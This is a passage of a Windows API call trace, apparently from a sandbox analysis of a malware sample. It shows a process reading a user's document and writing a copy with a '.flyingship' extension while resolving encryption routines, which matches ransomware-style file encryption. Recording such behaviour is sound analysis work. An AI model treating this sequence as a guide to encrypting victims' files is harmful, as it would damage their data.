lpMsg=0x87ee3c) returned 0 [0170.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.731] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0170.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.731] CryptDestroyHash (hHash=0x90ae18) returned 1 [0170.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.731] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.731] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.731] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.731] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\im npo61dtlm5sbx.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0170.732] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.732] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0170.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.733] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0170.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.flyingship.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\im npo61dtlm5sbx.flyingship.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0170.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0170.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.739] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.739] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0170.739] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.739] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.739] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0170.739] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0170.744] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x37a4, lpOverlapped=0x0) returned 1 [0170.745] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0170.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0170.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0170.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0170.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0170.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.748] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.748] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0170.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0170.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0170.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0170.749] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.749] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0170.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0170.749] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.750] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0170.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0170.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0170.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0170.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0170.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0170.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0170.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 